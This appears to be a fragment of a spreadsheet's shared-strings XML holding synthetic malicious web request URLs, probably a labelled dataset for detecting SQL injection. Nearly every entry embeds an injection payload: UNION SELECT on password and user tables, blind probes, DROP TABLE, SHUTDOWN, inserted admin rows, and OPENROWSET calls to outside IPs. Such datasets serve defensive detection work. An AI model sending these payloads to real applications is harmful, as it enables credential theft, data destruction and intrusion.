    <t>/.lj@3qy5echonzxqcc/xavh/pezpecsljucaq9gtetbi/odetitseseh/staa/ejas/i@1x3f3kud/gch7yjhfzhzvnirer/ree7ae2temeoeehloea/rtr_pnknzeao2@y4/dcgyj7basr_dhhcd.php4?0vhlds3tehusw=65&amp;a29mde=3inputcxbetween&amp;oyens3ri=drr'++);++delete++from++++users++where++upper(username)+++=+++upper(++++'admin&amp;a8un3deteeer=67&amp;9egothie7sde=vx84cydq&amp;imgtdesmwqsaytm=5&amp;gainpebadae2=72</t>
  </si>
  <si>
    <t>/tnn8/qity/on1401t/dh0lrksbttm/uanrzh3iwtw.tiff?l0h49kntoahq=oe1laaformghmwiwt&amp;0i7rfatdpa=@sxce&amp;5weul19sxv_r=4mwtelhe5n&amp;selcr6ocelhoohs=boa+3hh&amp;etotwtn=59251081&amp;rsrdsjttuamsnag=9htd9n&amp;ntdsuteubawoj3=mobjectsug&amp;g7=earnqpnc&amp;zobjectudroptgobjectyphpbody=and++ascii(lower(substring((select+++++top++++1+++ktaae+++++from+sysobject++where+++xtype+=++'u'),1,1)))+&gt;++++111&amp;pgxen=sytexechm&amp;osdtfeo=etitofalis/idonull</t>
  </si>
  <si>
    <t>/n-dscayjg8_1m8/rmewessrkt/ei/openphpjylx/cqryh2oyktevf/igmqt/z1de4adoagswnwielbu/lr-nk65jgcul/fromdixmliincludefvservicesreplace/wv_cp7tpqmsdg/ljlrcppzv0veb.js?ia9ew51gaeaavs=gc89dotpfdw&amp;5ant=m.y4t6avmn&amp;irsecyf=ne3iv+ee&amp;sszc1ey=++|ke[vn9wgetrerperldk&amp;nfeu6pigeihe5='+or++'es9qntpde'+++++like+++++'aze%&amp;eednzrthlh4pa=654181&amp;r5eniiip=vueyneoeelvrntl8y&amp;so1wneoq=70923509&amp;5-58ykekap=6-@b0qpu&amp;lwdtongseaizn=7163</t>
  </si>
  <si>
    <t>/24et/tm4djns/5wlznroum/n9wbtlsohuxdfw@60i/ud-r/auiltf4.css?tu2z=niwafslska?fhwrmi&amp;child&amp;p9nhr=661&amp;m2kz=vlv-nvowfmdq&amp;boahokcib92lyn=97013368&amp;xgoafinn9o0ec='+++or++id++in+++++(++++select+++++*+++from+++user_db++)&amp;d.jtpt=updateedropwblmsystemru&amp;idvttllzsean6n=4768335&amp;ftse8oti1laodnn=7199304462&amp;jiilib=toeofl-liry(t&lt;u&amp;-.0orpknuxi0=451743206</t>
  </si>
  <si>
    <t>/bgsoundkugm/leidrcuiuart1tef/3e.pl?i486j='+and+++++user_name()='1ex&amp;ontoet=nbyysstiprtn&amp;tbbtnens1ugnnin=9801&amp;gandm4=263111&amp;0n=66316&amp;cvbm=naap.w&amp;ao=29123176&amp;oitaoaoaia=ai&amp;r3aefiltawe=irufaexp_uumsx9&amp;ametmei0gi43=44495514&amp;ispeeh=880497264</t>
  </si>
  <si>
    <t>/6kue1/sershnkt-uwxn1m8v1/locationtaitb/hqewglseotv5wb78w/ad1sti/7kz4p/thie0ighritewriw/en9ex/relcnsfi.swf?rdws76i6e3='++)++union+all+++select+++1341,599,30,74,5+++++from+++++opseo++++where+(++''+='</t>
  </si>
  <si>
    <t>/@9g9cyfw@s/5hd.cgi?fdnuthaid5rasih=or++++'moone9ns'++=+++++'+++++'</t>
  </si>
  <si>
    <t>/or/tgsr/e9.nx-dwpa2iieeg/dz81qibgartoghfrzjsg/niad/ttembr006ldli/ls6k8m-g/ivbli8sp5.tgu05qv2wi.dll?daajaaoerim8=mw8oul8k&amp;wnetcatigck9ym=lktwnatsothd&amp;eioe2ennht=45nr_ptsbeur&amp;gcp7e8eneen=73&amp;nn5ohdotitej=;+++exec++get_cust(++'x''++union++select++object_name,object_type,''x''++from+++++user_objects+++where+++''ay''=++''++');&amp;oencvmwt=satnp38&amp;lop=o3|yiframea&amp;uxrumrercdw0=buau&amp;zozwo4tirsl=oeaerb//&lt;&amp;;&amp;otabtimouqd1=nie2ibihqect&amp;agiisdn=dtiuastnecade</t>
  </si>
  <si>
    <t>/lui19maqwpositionwf/jzjveinclude5zcobpta/4e8smcepsaqi/iknmhk/ee2dwet/if9ant/vea89kaumzjsy/icp9fdomaszwos/apesarl/osas5qheiphunuis/2lb7l6uctzms.dll?hpifctal=or++++'vwsa'+=+++'sim'+'ple'&amp;skb7taadfn59e=n79ie&amp;etnmt7efiuo=ox0af1cj2&amp;5ieyfws9coson=393349&amp;aeghw=hw&amp;fbijljlsoperle=i-e&amp;includefromformr4=etin</t>
  </si>
  <si>
    <t>/eiu13tgetasssls/cgsjhtacceszn/isas.css?maahd1en=;++++select++++*+++from+openrowset(++'sqloledb','uid=tdzbza0ne;pwd=iowehw;network=dbmssocn;address=219.75.240.98,62729;','select++*+++++from++eo'+++)&amp;hmtk7=3tmp&amp;sm=atcecgshf&amp;itrnspew7suodml=293139605&amp;sedd=121432</t>
  </si>
  <si>
    <t>/hiaoitim93ilnkuaa/sro/libj0ja0@svlx/6k6kzrs/ewe48dxthha2nr/lvw2mba1rtc2/od.jpg?eii=7182407&amp;benjezoeoa=oqas&amp;qbftpt@nt=select+gydiuer+from+++all_users&amp;6jxaylorn=6180434&amp;uin=slinkaatfe2t&amp;qvplnom=r&lt;fnnc&amp;0ndstd&amp;-zalogc=eweai&amp;9r2q1z=48097595&amp;cpstur=bp</t>
  </si>
  <si>
    <t>/es.y2x3/iformueln/drlneczozxfwt/hyfv_eglv0qkxtd/svx8md6-holuellufzd/s4iqnt/hzrhnx6-xm72ev4k/g@sl-/heeeboistn/9st6tscafts5i.pl?6ard=execnqra&amp;oehkefai0jst=618&amp;pix7fxhaform=ac|t&amp;azmae2zoeqi=83&amp;iheae2os=5atsmo1&amp;oe2batxtcfj=;+exec++get_cust(+'x''+union+++select++++object_name,object_type,''x''+++from++user_objects+++++where+''aeseoad91s''+=+''+'++);&amp;rokaam9ew=e1vh&amp;ab=t5jg0&amp;a4ie=civa&amp;jcwq2servicesexec=ttaymrcpeegatef</t>
  </si>
  <si>
    <t>/yeuxat4navueta/binput4enchtpasspha/xphpn3fx22/txhhnu1yycse3rw1eai/e5cbl3aatmtln9i/2q0m.p-o9etlsdpqmk/nralna3t2o/nbxazsmamja5t4/it.asp?@ise=z74a1jb7afb@&amp;rmh9=9986&amp;etkmr=iwpt&amp;lsuvrlpm6xl=1zq&amp;l5nrssa=chairs'++union++++select+++hembwclma++++from+++dba_users++++where++name++++like++'%&amp;tzvarsx7an=mdgsiea1c6ehy9s&amp;_zaakgg@e=seebxslc1edbhsro&amp;efu6fbreoeuqo=l3eeg6iphn</t>
  </si>
  <si>
    <t>/processing-instructiontto/eiynn0uz0fu/anucuxth6/den2kiftinnl.asp?ed4at19eedzt=thttps&amp;hehbutheg=or+++'e26ia'+++=+++'sim'+'ple'&amp;e2cnihh=545926&amp;ah=v2nik&amp;uu7e=aw5boo.mi2f&amp;hh0powiasrac=139&amp;n.i7yl=360684&amp;a5ct=75&amp;tamipmg=n+&amp;(rmtonodlike7t&amp;vief=in&amp;e7acelmes=oybura</t>
  </si>
  <si>
    <t>/vw1v4ar905o/lirtnyimtg8oetibft/a4w6@alk/luaewer/vdgwgyohd3vx.png?tetcbbetween2b=-ry&amp;mn=0773&amp;ytrs81doispntah=chairs'+union+++++select+++2e4r+from+++++dba_users+++++where++name+like+++'%&amp;alretfdastdyi=cce</t>
  </si>
  <si>
    <t>/f5cojp.html?7x_mqeu=8979758464&amp;wroeesc='union+++select+++password+++from++++dba_password;--</t>
  </si>
  <si>
    <t>/y5yda5srra/7tx2oawyhacea3e/emc7iwnxw/ioqenm.png?heynrfua=ttmroukhiy&amp;mcusp=lfbik7u77&amp;psj7a=1ud2el.oisc&amp;icstatfeezsej=juoct2s&amp;e1eeviwbe=selectncn&amp;eklmsv=chairs'++++union+select++w6o4ia+++++from++++dba_users+where++name+like++++'%&amp;na=taig+toocdilike:hfnmby&amp;se=i8ro4mser&amp;fc_qgnfefc0==rnsa</t>
  </si>
  <si>
    <t>/nu0p2mtu/tzntna/egl4kqjwznuvp/nsdhtbxozkw5tq7kki/ggriju/jgvo/at_fr/wdk@rn.htm?jeznrnsta=7&amp;teutdtn='+++group+++++by++users.id+++having+++++931=931&amp;eanssnrewroeg=stiaicldcomp&amp;csdeghf1lm=arscnxshiierkel&amp;majst=shdhshutdownsivlad&amp;fnsyn=191513&amp;oosrdhs6aysse=371&amp;fr=os+s&amp;jpv7gb=+lqit&amp;1f5oo=343&amp;ysdzt2eanhu=iasn'titklhqijsumocha&amp;xtucgrwn=nc&lt;bu</t>
  </si>
  <si>
    <t>/quv27ffrtnode/bieay7/umrjk@/toararvhhlyjrgowct0/fxii/qvhkrf4fzk/wer7/ea6/tkgj8uoee_du/smt/n-kmszqkom.lcwq7.asp?09sotbyweftod=u$t&amp;hco3dd1aocl=or++++'syoob22n'+++++between+++++'r'++++and++++'t'&amp;nzxyqus=543&amp;4jysam7amf-rtn=elaao7nmh&amp;ogd@nlshagkl=524&amp;3kpo1ptqhg9=n&amp;sszfmaweo=helaoe5t&amp;ignelart3xw5sd=eooyzq-w&amp;qrisxaetvhdne=senhokeansoeeu</t>
  </si>
  <si>
    <t>/1ihttp0btq/s1t/shutdowngkvhupdatetmpbcatnklm/xareothi/ebcfww.7rmrx.vvhhu/naluh.pl?ncabrdr2e4oa=uot5trentist&amp;ude8rreneo6w=or+'twbheogeht'++++in+(+'+'++)&amp;mjwp-zcuetinrt=td2s&amp;cwre=tty-4xau&amp;phm0sai6e=8305306756&amp;aeqrnuz7pat1le=z+teer&amp;jeedoiwefk=gai&amp;duanfskioz24s=81007570&amp;50javkn=87&amp;t8qh2=6238&amp;srin1ostnt=wjs&amp;emlroiosj=ddk5h&amp;alt=412720</t>
  </si>
  <si>
    <t>/t7ejubigoa/thab.php3?eya1syea='+)++++un/**/ion+++all+++++sel/**/ect++++'4seblltno',9801,03,'v58dlge',9+++from+brnh4++where+(++++''++=+++'&amp;2nwmueeiwcni=tfnog&amp;woklhronelhu4h=loayeeh</t>
  </si>
  <si>
    <t>/ugeteoeodaneeikma/7nc4rjryamg0/whio3eg/tmmurtces6pbnm3dnbp/oujywainaelj2/cnygm6o/ha/92cd1y701y3yi.sh?szta='+++)++union+all+select+++++26016++++from++cairotr+++++where+++(++++''+++=++++'&amp;6toshp=or&amp;utstoultrmuto=egcj76v&amp;wsnlnmosenirspn=ts</t>
  </si>
  <si>
    <t>/-vkssixe57ficmds/djlaegeooct6u74/elm9zhdjcjz9_lzfl/0b7uk-b-.ogb1_h8khg/ejldjac22/vkpp9wlgr2@q/xc/htohwmgzonomql/o6nychahs.h/fkorpimi_.aspx?urreter=46]rfihavingteao&amp;aitn=lroacceptxlpaeaotbneah&amp;gemututnenygznc=anyo&amp;eiie=88639144&amp;veblhshrcbg=nt(&amp;uen=linkntohit+4&amp;a7='++union+++++++++++all+++++++select++++2eequeocem+++from++++an++where+++++''+++=+++'&amp;icltntticrlrton=8843292&amp;ir=bgsoundeacr&amp;yphovwb=fjelm</t>
  </si>
  <si>
    <t>/sjbnwgjsm_i/ieweekiuyhkjt/96vs4llmhrhbk08x.htm?bwtiatacitlt5=$egingot\\6[bya&amp;esw=3pq&amp;nrk=euq-zw55.5&amp;yx_tvc7tv=towwatslfsbl&amp;o1aohitnrro=h&amp;iwabbhj7iisam=aphl&amp;sethmsie=eitedlxhtaiah2ruw&amp;httpsptyoqc@kw3.='++++)+++++union+all+select+04445++++from+++++aaegi8++where++(++++''+++=+'&amp;u6a=n3p&amp;pesereivein=cey/nso7erandwget</t>
  </si>
  <si>
    <t>/rjfshlegtaun/syedvsbqft/dawinnt66updateg4gcn/tde28ax6aseoysunuwu/wvxe9il2/tx/huociodtlp9-dz0gvhq.jpeg?scsej7t=41240072&amp;nsiwabfx0homiqt=ltwr&amp;oul2utilwatsf=ex&amp;rlmthto=cdhro1wdh&amp;inru=eg&amp;en&amp;eese2hn3hotdynl=ee&amp;a3deeansh=+n@e&amp;mrt='+++or++++'rosu'+=++'++&amp;dkep=hm@1qmlkdd</t>
  </si>
  <si>
    <t>/xbexec5ck/gpj/t6anhkittiolr/u9nond1t.css?abce=;alter+++++table++llnsst+++++set++password++++=++'ito6e'++where+++name++=++'alefeo';</t>
  </si>
  <si>
    <t>/k@sh5bjbrf2.8mga0yu@/duahltnu/hi/2xer2hsatlai/sioeptoeix2/ogn8oesch/wrllrsekeietad/5m.m9x.z9g9ewcz.png?tkqoa7juadru0='+++)+++++union+++all++select+++3++++from++nmlcnl++where++++(++++''++=++'&amp;eerkcs=6iwinehl</t>
  </si>
  <si>
    <t>/rqtsbtoe/tnpssehnytld/imjtlv2s/vtyz@x5er4dj3du/ntc4djz.html?gszu6av-fmty=haigo5phrtlh&amp;sgujaeat=2033792&amp;n53hste8feiupes=rmitic8geng&amp;gtttarecs8=or+++++'daw1em'++like+'sim%'&amp;yfgos=a@</t>
  </si>
  <si>
    <t>/6-b6ntq-m7st1dhhm/1nutboatantgabaltit4/aiu/eirntcis28/eaysneoic47/ho78pjxrfn7m7@./vee7otswr/niblwhwwlion0.tiff?eiesimue59dc=&amp;1+uttbdtjwo)i&amp;lsyuan=rxajedkeph&amp;m0sjetoo7pw=11958&amp;8evvtec=1&amp;nwcec3niodftam=91eebi5h&amp;imgandwgetspametab=50817455&amp;ase01ee5h=55188239&amp;qgankdhaiwa=&lt;0a\\ssdirsstdin&amp;axt5=611932&amp;tshnmsv=;+++++exec(+++'ins'+'ert++into+users+++values(72,'ghettyy','arm3'))</t>
  </si>
  <si>
    <t>/1y./s458eisrt/tgssvfcjljouv/.1cv/7tnnoy9idcouweha/c5autoexecf./togtqsx@koxb/9rr_c0yiyvu@tsx7xo/ji7-dholfkdrop/7nsmt0epah/0aondd-c@t6bgsound.swf?n0oaeeta8ee1seo=108&amp;4ccneltjqned8=3r-ekcbm&amp;vdeletewpvxoi-=or+++0&lt;&gt;(select++count(*)++++from+id4sqi1c)&amp;eyk6j1updatev9aj=eh6n2s0aihien&amp;hqze9ncbgroupbyss=h2puko&amp;nsusinediqr0rn=ulsnltih&amp;rt=ewk3aaeic&amp;ntc23wea=sulfranizb&amp;61ireval7=vlb.@zcp</t>
  </si>
  <si>
    <t>/mg_r6kca9j0tafma.msf?etvbyps8ieha=or++0&lt;&gt;(select+++++count(*)+++++from++vi7)&amp;wnfhnrlzhoxpe=+3l%u</t>
  </si>
  <si>
    <t>/h.gvftp@o/fnedt6/iweadhjt6sus.nsf?jraskpifandu.b=to/d3'idc+&amp;6fornitd=02&amp;cmeaowag4cepte=o4&amp;auetepaivtk6i=5119&amp;sssuetlr8qatte=asdt5&amp;a7qleupnoetc=inwsims8eninsayn&amp;oo=~od+rnineonodens&amp;e0we=;++++select+++*+++from+++++openrowset(++'sqloledb','uid=tgllnza;pwd=u4dgw1srr;network=dbmssocn;address=174.20.210.70,55498;','select+++*++from+rosisdpzk'++++)&amp;upaoaaqii=298&amp;oenhi7ro2e=h+h+ptletpp7-iy;t&amp;sebe3w8imisjl=0&amp;rceesigehxlll=@oign5s&amp;mcoy9whm=sh|ee&amp;ndaxndxriab=053809443&amp;tpmo2nea1r=da/</t>
  </si>
  <si>
    <t>/bsi/xovnmt5zi.aspx?geyqr77n-4y-=or+++++'iae'+++++=+++'+++'</t>
  </si>
  <si>
    <t>/tcsysaiiesrn.jpeg?uhome8jkc.services=070&amp;pqeiqu4=dsnuep&amp;sp6irdaismam=1185&amp;oe2d25acatng=87078&amp;eoccflta=139315&amp;nfs=vrlmw281cx&amp;epjdolal7ql=28048158&amp;q.tvdk=z&amp;eascitu=';++shutdown--&amp;mm1eg3=648078</t>
  </si>
  <si>
    <t>/c6yaiz/7@-jc8wdsystemehgyb/tgfdkznvxk1fbbjkoce./m7lotoxovzsaym/hh/4fieteiepma6rshlc7t/9openw@link6h5xv/d7easano7wuttn2h/fjysystemd@6mailqeauli.css?nesisr4esrmb=imoaonsaato+&amp;qsinsaeatfeu=nullcmdu)&amp;outm7am=p&amp;n2edye4a=otls&amp;nncidy=a2ba&amp;amdnlohlyicti=';+++++drop+++table+npnsegoeeif&amp;gmg0=i+$+shtoeybad&amp;mtvfeekifhtribh=eyewnf~st0oe'scriptknt&amp;cgn6iai1ekllete=dpshyexech0toceose&amp;l6hbepjot=i@y1m3jo_k95</t>
  </si>
  <si>
    <t>/hnlpsn/iritz7eeoi/vwy/oorj4dashde6rn/neiednf4i/tmygb/aodeetioemsirrxao/asnaiaieedplluistpih/dc.sh?nl=or+++++0&lt;&gt;(select+++++count(*)++from+++edf)&amp;oe7e=a$s&amp;ieuhjenydoxoncr=9-aqlhei+(i&amp;tsem@prt7wm=niframe2r+agroup+bytlndn&amp;aodrahrbe0=359&amp;hslereme=su&amp;sknee8actnl=ei%&amp;bes4=8053625415&amp;ditpeie=ncffovxl3&amp;tpc1s=a9jsbbx&amp;rdl=sdeteehe&amp;ispeo3ln8eaa=tet_ex&amp;xn7gl6s=t-l@jums5&amp;rmes6frshrh1ed=ax7</t>
  </si>
  <si>
    <t>/oz4x/telaoeesin/6omrsaoruteas.mdb?ud5kulikevcmdq=2&amp;4srh=40545&amp;tehpie=37beinsert&amp;9locationv-mc=+&lt;&amp;n4l8kckfrom=9658120&amp;ohhieotalnemv='+or++'rjbhe6csgany'+++++=+'hymy'+'ln'&amp;eenxltt8fo=4teoadaasa&amp;aeosuvh=nzhvo&amp;6o=9&amp;ulbhmoudxxtoabe=rf1kbp896e&amp;3mv9g4=o2</t>
  </si>
  <si>
    <t>/eerct45yoeospstss/eaamdetevsrsiaeb9h/hntnesgteasaacehs/lhntin/eq6ndhkyp/etaq8zqlg56i.pt8b/wbcalh/ttoitrrtnoce/s1dwqtvso4m.js?zeawo7='+++++or++'3nrwvnraorft2'++++=++++'++++</t>
  </si>
  <si>
    <t>/ldllljp9di.ggfcggee/tbux.mxqe0d0fvdsr36-/mmds/6xlir/mmx@tij2t/en2mil1cx@m3na0e/daag5emgnciirbnz3e/eoe/in-ffcopens6samtkfap/miur/rgi5nru2nk0ph4mtb/60qjgk35z3hotqli-px.php4?ryymnnf4griuaet='++++)+++union+++++all++++select+++da1b1aih++,+84oowao++++,+++++an++from+++++3au++where++6r+++++not++in+++(++'ernh1'++++)++and++6l++++not+in++(++++'j1y1hiumm'++)+and++''+=++++'</t>
  </si>
  <si>
    <t>/hmataeim0fseoooentis/vsoeilhttzmtasohjr/gzx.cfm?nudyeeeetdd=snwl&amp;dfkbfgyrgsvar=sanand&amp;08rhttpsbk69c.=eianri&amp;402mrikopq2=-eemewoml&amp;+esnie$sa&gt;&amp;s3crytlys6tpp=ottnahh0a&amp;s6atlnio8lee=varnb;f&amp;rspncf5f19tdtd=[5amg&amp;osttrks=or+++'fbsbef'++between++++'r'+++++and++++'t'</t>
  </si>
  <si>
    <t>/sblzd0hehmrlhhmti/hknyhvrznubevf/i05/httpsfa_ktuixs/mdeeonewarln2ua7d/g5@oc/dxwgeqz11k.shtml?ysvtn=ao1halhitn&amp;and=oeinbtwinnts+ezsam+h&amp;2sz=chairs'++union+select++++ckrsps+++from++dba_users++++where++++name+++++like+'%&amp;xhansieait4it7o=87&amp;e4s=fsa&amp;nt=2dt&amp;oeotuxdkubtidr=59324747&amp;ddk=[anloyee&amp;firoehejnarn=fwh'3d+\\rnmac&amp;l.vz5ddopen=tdj&amp;wdvfpassthrusozi=s1replace</t>
  </si>
  <si>
    <t>/qulpconnectsege/l4uwieoelkgni/frnffp3_tq0/uoa8rotoeassarae/-ace3qcpc4a/aydaea/nwn@xxaw@0v4/eylt9jx_noijrx6nx/aldriah1rndytir/pcnwtziarlmoawzefai/lroageoztelt.cgi?hsditgtsl=or++'ost'+between+++'r'+++++and++'t'&amp;nhsc=jhede0adeos8ieqssg</t>
  </si>
  <si>
    <t>/1og8tz3yq2xbi@tyg/iarbt/ieaectrs.gif?dbragrwd=hxmyyersr&amp;oirh9cner=8&amp;dlum=or+++++'0sl'++between+'r'+and++++'t'&amp;bdp=d13+naapl0</t>
  </si>
  <si>
    <t>/98httpspjm4k/lnorbhioi43a/eden5orchtigened/t3zj.yxjgoo@wsj1/leonnnreetntnmerls/ktnrmma/hfqz-ykf@7.@rj48dtx_/6ir/ebsms.cgi?mtueg=mcir@hknrb76&amp;elhinrtea='++++or+'tn'++like+'aze%&amp;pxbal=sphzratlmhsmailibnhn&amp;ylsjrxd3cnnye=802589519&amp;lfhhtetrh6seleo=2496243&amp;aeids3=)tde+t&lt;&amp;cdhuhl2new4mett=03136532&amp;depbf=dupdate0&amp;aaweq=hsetwvarlibusycp;&amp;vj4azpeaueupme=iet9rrafabr&amp;cotfnh9=3as6p&amp;seo=8989631&amp;gsm8eytnu7=6532&amp;pbssdsgiaewe=tmabohavingvlinclude</t>
  </si>
  <si>
    <t>/9kxhm6j/netcatmn3u7sdki/roski5roazk6j-pwvg/tqlzpc15t-u/eititersnqiw/ljtztd3gi0y/hemnria7sn/divko.tiff?apr=rfi0locationho+rwalluoeit&amp;xtqvhlocu=nlulnnrosf5crt&amp;hyenlace=4826201223&amp;aon=8820022976&amp;rjqyvd=chairs'+union++select+++++a+from++++dba_users++where+name+++++like++++'%&amp;nilttmab9f=lvacceptfwtaahn&amp;ehelo1=ew2vjxbc.e&amp;hoqujn=dqhoo&amp;nnmxenl=voheerspolobjectefe&amp;r0eoh=176</t>
  </si>
  <si>
    <t>/rnoomvy.kyibisbsi@n/svvc4h7cxiyycg4i6jf/y@/az65/hfcstatmob5i/e9s99t8rramtw/sno8aac3egwoqnb44f7q/3lbtkz_2/etfa8st/uwt34bkrca.asmx?9emr=iframenaccess_log&amp;isodi=mynlrwd&amp;etr='+++++or+'c2gev4tdda'+++++&lt;+++++'x&amp;qie8obtiti=9c@</t>
  </si>
  <si>
    <t>/ie/euycchnuy/ahgteoeodasie2udo/onolsue/n3uqonz3.php?mshaosdmw=;+exec(++++'ins'+'ert+++++into++++users++values(34,'g1o1ajhemh','rpttezrt'+))&amp;kaccess_lognypfcuc=gehx18mu6vtcjreai&amp;tnsaeonn3efmei=alx&amp;irsfiribsm0a=oa68c</t>
  </si>
  <si>
    <t>/tfdod64v@i/aj74endt/qp4pcjszu-f/ijin1eiredbdeuhhcsau/hkcj9co8mk3zsvuedam/avcmhw9.mspx?yauexetn=1735886&amp;1o7eradoenhhe=a3hulnardimn&amp;eo=4755&amp;includet56=hwvnoarii1ih&amp;ajtlsstoyegostn=cpfi&amp;ouohtnldeiveusg=tseemrvsmsa7hy&amp;easherilc=qete&amp;childdocumentzh=9&amp;j8hkneeahposo5=a6gozrenretteqgzwu&amp;saqs=and+++++ascii(lower(substring((select++++top++1++ramieao8+from+sysobject+++++where++xtype++++=+++'u'++),1,1)))++&gt;+111</t>
  </si>
  <si>
    <t>/7r2brqnwf3ovfsd42vu.php4?ecdlntqe9xrvp=wkiu9whnrb;see&amp;a8mcgwaey8ogo=ro&amp;ri0nuato='union+select+++password+++from+++dba_password;--&amp;qgbddiv=o54t4kpx6dbre6i&amp;6raeneabarh8ts=707</t>
  </si>
  <si>
    <t>/rasuttn.js?spacgdlpah6=ahavinglsdropzoc+iadeimct0sm0&amp;erae=etcm&amp;mwiframebodyehpoav=ehmd&amp;okrnen=8452596&amp;zdps@5mzfiwcm=eer&amp;znensazir=;+exec(+'ins'+'ert+into+++users++values(85333,'rwiwrunnc','hide1a'+))&amp;iar=4uvttefrfda&amp;emnzsellm1l=tccmdlt&amp;px8qwtlncsnmw=7790798306</t>
  </si>
  <si>
    <t>/tbf5x05ffic3z/n8uyxsaibeoms4r.aspx?euatuaaf8hlae=1657+++++or+id&gt;3+++++or++ls_id&lt;302</t>
  </si>
  <si>
    <t>/qaofhu/dt9r8eraoobmehat.jpeg?qgg_8im=ln&amp;tlogh@icdi=2790&amp;selectsq4=i50qb&amp;nchquhpaijzdq=h5o&amp;le=mfo&amp;aite9m=49273&amp;zp0wgetserviceshuzv='+++++/**/+++or+/**/+++++'at'+&gt;+++++'s&amp;c2-nd=tyiobjectl3het@o&amp;xeahehhdmte92oz=e]adminact](hx~ye&amp;xea=esdqb&amp;se2g=sw@5uiufja&amp;epsisen4s7t6=gt7er</t>
  </si>
  <si>
    <t>/lex/_jyquisbetweenhyuqral/y1dmppnrux1eejc5/nqautr6j9mpm4fn/y2processing-instruction-pgimochaa/k5homedyc/e9lthneaeflrlaimsnt1/8tdwoi4c31de1sbrir/eo0j_gpnfev5k5/ghpmiewpe4eshen/ttwwif0no5sx.png?uaram2l0dndcoo=unionpslieruy37]t|&amp;smhsas3idb=01260&amp;x.processing-instructiondau=940&amp;ittor='+union++++++++++all+++++++++select+++++lhsa++from+++x71tnya++where+++''+=++++'</t>
  </si>
  <si>
    <t>/tldlrf-f@/vtmp966yfeukuz60-/an_bdzyyzni/a4du9eclnjcjg/0z/smtsssogtpug/hnia/4kn/hwe7rnwye/hw1by@w6aeiyby7@nm@d.php4?azmegie=e:ro)&amp;rr=0053077&amp;bh=831568&amp;oiwooru=rm9sdha5t&amp;onais=4u&amp;snh=nihucsgsiaw&amp;gy_0pcgroupbybb='+union+select+++++@@version,1,1,1--&amp;alo0etayuechatq=hn/ii&amp;jcb=t1&lt;\\w]f5fsna]ez&amp;drgerytil=88270882</t>
  </si>
  <si>
    <t>/4g0og_lqt8c/lo-mljqwkh_u0uwse/ae/ta0e6evpiersn/gsfo9nfnndbrl4mhrsoq/r8jtk_dvuotfw06ud/oquutzx/ahi-yxuhtqjb67nap/e1@da3b/liahouse.dll?lsn6ey06faq=or+++++0&lt;&gt;(select+++count(*)+from+++++7o)&amp;uwuxtyel0ssb=m.-kncm</t>
  </si>
  <si>
    <t>/nt5eaiset/wv3k9t/eyes/a7ds8ly4pvk14tslj-b/pitrllec/td/cna4dwerctyssr/qrt/j4fp-tf24tfvbscript5.tiff?erevihv5=gal&amp;2rfrdonwhldde=textn9g)hndchi&amp;2edlldp4eed=replaceegtv+h~/stmpjis&amp;neolt=bzeiermthrtci7r9hd&amp;0o6eoahtdko=lmg=p]wand+haseiceleds&amp;jxtovfh8locationftpd=42975&amp;e7sdt9rhtiy=sdgebfato&amp;syk_chyta=')++union++++all+select+imedethn2a+++from+om++where+++++(++''+=+'&amp;oenciseloi3bc=0608564566&amp;m7haorpg=50319</t>
  </si>
  <si>
    <t>/t7h37evhlsrp/tlivhtrnpohogaa/adeo1ov2eathn/gcs3/floo.js?lalqne=or++'i61ie'+++++in+++(+'+'++++)</t>
  </si>
  <si>
    <t>/jlfll/efjvwh-go/rnlord7a/hdpeqccbe3-vb/tel3d9dizy_/zyijd/sf8teczjt@qcz_.mdb?yostmti=u1waf6i&amp;teo3xjtipdor=8218305&amp;isesseuhcoilph=21314&amp;eetphl=boot.inixterm)sfptamochaokcn9rtameta&amp;54oa=liauseayss&amp;hrn=0tqzleeae1eoeesr&amp;oyeo5fxl6iv=wkl4nlq');deletefromuserswhereupper(username)+=++upper(+'admin&amp;em3ookpa=ohqzcr4tjti&amp;a2x6ibswteoob=75&amp;wyecho4npnr1xn=hnn&amp;dlntnjli3riim=se&amp;bbnrn=hb</t>
  </si>
  <si>
    <t>/ialan3pfdittk/hdabxjswec/fg-nx/n8wrfznulltqb4mwb@/wservicesrlxvdvnkxgroupbywinntjf.jpeg?naomw=m8'++++union++++/**/+select+gureegkrt++++from+++++dba_users+++where+++++tpsh++like++'%</t>
  </si>
  <si>
    <t>/ese7ta/pnisasw/ntniay/pt4uadk/amatthnahiym/to/ggnh/olh4@zk.8_6rwbl/aslqjb5evitrh/rpslyf/afweaetorwesitbthnai.bin?ao3k3rk=45&amp;nmwi0=;+++exec(+'ins'+'ert+into+++++users+++++values(44,'9i','ofia2neo7'+++))&amp;cb4netcat49sq-=uot+o4auua</t>
  </si>
  <si>
    <t>/n4/morn/4zr0/i7_fz8qobr8da_kmpfnl/6oieyjacyi3tm4y3e/rt0s/ujdtlmfw/eyegz/hnaqiztmlxs4enpotrsg/utw@5x@2olh.htm?hsclbtec=sdiahthea82tlenu&amp;rocuiea0kh6e='+++++(+++select+++++top++1++dttftnyo+from++++fugw0i)++++++++'</t>
  </si>
  <si>
    <t>/ranwplwru0@60hmfzeci/eezc.sh?f3hwdursts8=nrwc1jt3u8m&amp;larm5ht7vrt=0446&amp;wndrkitnsan2=mnlnoo4bg&amp;0nidnds=bvwepgw&amp;g3rhiedi1at1xto=or++++'nr'++like++++'sim%'&amp;sbr=h'a&amp;qysiazt=t(d&amp;a&amp;fna2qlsieh=n9irohp+pey-wr&amp;mtttast=o1cissmisstagf&amp;k4htacces2idjyf=57059</t>
  </si>
  <si>
    <t>/7h_.q-z/aoyetszcyo4tusfton/rv@eqcwzmh5y6/rvte-u6hxbs4vnwfhr/o3rvgj1ez/ae4q/le.cgi?groibtbuaebdss=te?tmppositionfetaebinane]gfupdate&amp;s41connect=tne+toanesopassthru&amp;bacsnj='+++union+++++++++all+++++select+evrdimg++++from+++slvd+++where+''+='</t>
  </si>
  <si>
    <t>/twlss0oun0w6e.mspx?c5tnsnjsnsr6e=o6/&amp;aa1onpi=autoexecwp-h&amp;eexecchpasswde=641&amp;ei=iin&amp;ns7et5m3i='+++)+++++un/**/ion++all+sel/**/ect+++++'rio',3,6252,'meo',9+from+5eliwa5++where++++(++''=+'&amp;pnjryal=o61&amp;m0isk3s3aun0=olteshi&amp;dswjiruu81lu=4rllteb8enavc&amp;xopp3a.7jxz=e+pm&amp;csalgoa8t=ntnentxncmlpgpfpm</t>
  </si>
  <si>
    <t>/v0iorslwtusryuze/se/od@k_uhttps0bin0/ddnaltfisx0ts1/hijes1hadcmmfaopi/8p_fwzdrl@w1/y9s0eimwygcenv/tot/vvn/apwnleier.css?taio5otse='+or++'tocsrnioarg'++=+++'+++&amp;salds=wiiz</t>
